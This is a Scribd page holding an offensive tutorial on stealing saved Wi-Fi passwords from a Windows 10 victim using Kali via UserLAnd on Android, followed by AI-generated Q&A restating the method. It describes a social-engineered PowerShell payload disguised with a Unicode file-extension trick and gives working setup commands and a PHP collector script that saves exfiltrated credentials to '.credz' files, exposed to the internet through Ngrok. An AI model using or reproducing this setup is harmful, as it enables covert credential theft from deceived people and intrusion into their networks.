Scribd
Upload
18 views4 pages

Wi-Fi Password Hacking on Android with UserLAnd

The document outlines a method for using the UserLAnd application to install Kali or Debian on Android without rooting, detailing the limitations of running Wi-Fi hacking tools like Aircrack-ng. It describes a technique to capture saved Wi-Fi passwords from a Windows 10 system using a PowerShell payload and a local PHP server, facilitated by the Ngrok service for external access. The document provides step-by-step instructions for setting up the environment, installing necessary software, and running the PHP server to intercept Wi-Fi credentials.

Uploaded by

kkodiesell
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
18 views4 pages

Wi-Fi Password Hacking on Android with UserLAnd

The document outlines a method for using the UserLAnd application to install Kali or Debian on Android without rooting, detailing the limitations of running Wi-Fi hacking tools like Aircrack-ng. It describes a technique to capture saved Wi-Fi passwords from a Windows 10 system using a PowerShell payload and a local PHP server, facilitated by the Ngrok service for external access. The document provides step-by-step instructions for setting up the environment, installing necessary software, and running the PHP server to intercept Wi-Fi credentials.

Uploaded by

kkodiesell
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

The essence of the method

We will use the free UserLAnd application, which allows you to install Kali or
Debian on the Android OS without the need for rooting (obtaining superuser rights).

However, the most commonly used Wi-Fi hacking tools (such as Aircrack-ng) will not
work with UserLAnd. To run Aircrack-ng, you need to switch the Android wireless
interface to monitor mode, which requires superuser rights, but which is not in
UserLAnd. Even if it were possible to configure a handshake interception using WPA2
encryption, password brute force on an Android device would take too long due to
insufficient processor performance.

However, there are other ways to compromise a Wi-Fi password. The method described
in this article requires a little analysis and social engineering. The Kali
distribution installed via the UserLAnd app is used to create a PowerShell-based
payload to copy saved Wi-Fi passwords from a Windows 10 system. The payload file
extension will be masqueraded with Unicode to hide the true file type.
To intercept Wi-Fi passwords sent from the target computer, Kali (on Android)
creates a local PHP server. Bypassing port forwarding and firewalls is done using
the Ngrok service , which allows you to make a local PHP server accessible via the
Internet. The target system will send Wi-Fi passwords to this server.

The above is more than enough, but the hardest part is getting the victim to click
on the malicious payload. We will consider this topic in more detail later.

Getting Started with UserLAnd

Before proceeding, it's a good idea to check out the guide on how to turn your
Android phone into a hackable device without root privileges. That note gives the
basics of UserLAnd and mentions other aspects necessary to successfully implement
the method described in this article. You need to install and configure UserLAnd,
create a new file system , and connect to the OS via SSH using ConnectBot (or
JuiceSSH or the built-in SSH client).

Step 1. Installing the software


It is necessary to perform a system update and install the main programs , as
indicated in the UserLAnd guide I mentioned. Then you can proceed to install the
specific tools that will be needed to implement our method, namely Unzip and PHP.
To install Unzip, use the sudo apt-get install unzip command.
Code:Copy to clipboard
apt-get install unzip
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
zip
The following NEW packages will be installed:
unzip
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 156 kB of archives.
After this operation, 518 kB of additional disk space will be used.
Get:1 [Link] kali-rolling/main arm64 unzip arm64 6.0-21 [156 kB]
Fetched 156 kB in 6s (24.5 kB/s)
debconf: delaying package configuration, since apt-utils is not installed
E: Setting in Start via TCSAFLUSH for stdin failed! - tcsetattr (13: Permission
denied)
Selecting previously unselected package unzip.
(Reading database ... 13159 files and directories currently installed.)
Preparing to unpack .../unzip_6.0-21_arm64.deb ...
Unpacking unzip (6.0-21) ...
Setting up unzip (6.0-21) ...
Then enter the command apt-mark hold apache*to drop some of the Apache web server
related packages that are automatically downloaded during PHP installation. In this
case, we will not litter the system with useless binaries and services and thus
speed up the installation a bit.
Code:Copy to clipboard
apt-mark hold apache*
apache2 set on hold.
apache-users set on hold.
apache2-bin set on hold.
apache2-data set on hold.
apache2-utils set on hold.
apache2-doc set on hold.
apache2-suexec-pristine set on hold.
apache2-suexec-custom set on hold.
apache2-dbg set on hold.
apache2-dev set on hold.
apache2-ssl-dev set on hold.
apachedex set on hold.
apacheds set on hold.
apachetop set on hold.
After we have abandoned unnecessary packages, we proceed to install PHP and enter
the command apt-get install php.
Code:Copy to clipboard
apt-get install php
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23
libxml2 mime-support php-common php7.3 php7.3-cli php7.3-common php7.3-fpm php7.3-
json
php7.3-opcache php7.3-readline psmisc xz-utils
Suggested packages:
bzip2-doc php-pear
The following NEW packages will be installed:
bzip2 file libapparmor1 libargon2-1 libicu63 libmagic-mgc libmagic1 libsodium23
libxml2 mime-support php php-common php7.3 php7.3-cli php7.3-common php7.3-fpm
php7.3-json
php7.3-opcache php7.3-readline psmisc xz-utils
0 upgraded, 21 newly installed, 0 to remove and 0 not upgraded.
Need to get 13.6 MB of archives.
After this operation, 58.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]
At the end, you need to restart your Android device. In this case, we will already
know for sure that all packages and updates for the kernel will work on a system
with Kali installed via UserLAnd.

Step 2: Set up a PHP server


After rebooting the device, launch the UserLAnd application and connect to the
system with Kali via SSH.
Now we need the Screen application, which allows us to manage multiple terminal
sessions within one console. In our case, we are talking about the same Android
device. The Screen application is able to "detach" or close the terminal window
without losing the information you were working with during the session.
To launch the application, enter the following screen command .
Code:Copy to clipboard
screen
Then open the shell with superuser rights using the su command.
Code:Copy to clipboard
su
Create a directory called "phpServer/" using the mkdir command.
Code:Copy to clipboard
mkdir phpServer/
Change to the created directory using the cd command:
Code:Copy to clipboard
cd phpServer/
Create a file "[Link]" in the nano editor .
Code:Copy to clipboard
nano [Link]
Paste the following PHP script into the created file, save and exit nano. Press
Ctrl-x and Enter.
Code:Copy to clipboard
<html>
<title>PHP Server</title>
<body>
<h1>It works!</h1>
<?php
$file = date("dHism") . ".credz";
file_put_contents($file, file_get_contents("php://input"));
?>
</body>
</html>
This PHP script allows you to intercept data and does not require modification.
When a target Windows 10 system sends Wi-Fi credentials, this PHP server will store
the passwords in a file with the date in the name and ".credz" as the extension.

We start the PHP server using the php-S [Link]:80 command. The -S switch is
responsible for starting the web server built into PHP, and [Link] makes the
server available on each interface. The port number on which the server hangs is
80. This port is used by default by all web servers and browsers.
Code:Copy to clipboard
php -S [Link]:80
PHP 7.3.0-2 Development Server started
Listening on [Link]
Document root is /home/user/phpServer
Press Ctrl-C to quit.
To exit (or detach) a session running in the Screen application without stopping
the PHP server, press Ctrl-a followed by d.

Step 3: Check
if the PHP server is running There are two ways to check that the PHP server is
still running in the background. For example, you can use curl to send some data to
the server that emulates a Wi-Fi password.
Code:Copy to clipboard
curl --data "password: qwerty12345" [Link]
Then use the ls command to see what files appeared in the phpServer/ directory.
Code:Copy to clipboard
ls -l phpServer/
-rw-r--r--. 1 root root 217 Jan 9 00:10 [Link]
-rw-r--r--. 1 root root 0 Jan 9 00:15 [Link]
We look at the contents of files with the .credz extension using the cat command.
Code:Copy to clipboard
cat phpServer/*.credz
password: qwerty12345
The second way to check the health of the server is the netstat command and the
browser on the Android device.
Code:Copy to clipboard
netstat -luptn | grep -i php
tcp 0 0 [Link]:2080 [Link]:* LISTEN 14128/php
Please note that PHP hangs on 2080, not on port 80, as indicated in one of the
previous commands. For some reason, when opening ports in operating systems running
through the UserLAnd application, 20 is added at the beginning. The reasons for
this phenomenon are not completely clear, but for us this fact does not really
bother, since the Ngrok server will work fine.

We open the browser in Android and after entering the addresses [Link]:2080 ,
the message “It works!” Should appear.

Common questions

Powered by AI

UserLAnd provides a platform to install and run Kali Linux on Android devices without requiring root access. Installation tasks prioritized include system updates and installation of essential tools like Unzip and PHP, while avoiding unnecessary Apache packages to ensure the setup remains clean and efficient .

The Screen application allows the user to manage multiple terminal sessions within one console. It enables the session running the PHP server to remain active (in the background) even if the terminal window is closed, thus maintaining server operations on the Android device .

The nano editor is used to easily create and edit the 'index.php' file, which contains the PHP script for the server. Its simplicity and availability make it suitable for quick edits directly on an Android device, facilitating the setup of essential server files without requiring a complex setup .

UserLAnd alters standard port assignments by prefixing ports with ‘20’. For instance, the PHP server intended to run on port 80 is actually available on port 2080. This discrepancy might confuse users, potentially stopping the server from being accessed as intended, unless recognized and adjusted .

Ngrok is essential because it bypasses port forwarding and firewalls, making a local PHP server on the Android device accessible via the Internet. This remote accessibility is crucial for the method to work as the compromised Windows system sends intercepted Wi-Fi passwords to this server .

Running a PHP server on an Android device can expose the device to security risks such as unauthorized access, as it makes the device a potential target for attacks. Using Ngrok to expose the server to the internet increases this risk, as it may attract malicious entities attempting to exploit the service .

The PHP script is designed to capture inputs and save them to files with timestamps in their names. This ensures that intercepted data, such as Wi-Fi credentials, is stored efficiently and organized based on the time of interception, which is crucial for later analysis and usage .

UserLAnd does not allow you to switch the Android wireless interface to monitor mode, which is necessary for tools like Aircrack-ng. Monitor mode requires superuser rights, which UserLAnd does not provide. Additionally, even if a handshake could be intercepted, the lack of processor performance on Android devices would make password brute forcing impractical .

Social engineering improves the effectiveness by tricking the victim into executing a malicious payload that copies saved Wi-Fi passwords from a Windows 10 system. The payload is disguised using Unicode to hide its true file type, increasing the likelihood that the victim will interact with it unknowingly .

The installation of unnecessary packages is minimized by using the 'apt-mark hold apache*' command to prevent automatic downloading of Apache-related packages during PHP installation. This practice also speeds up the installation and saves system resources .

You might also like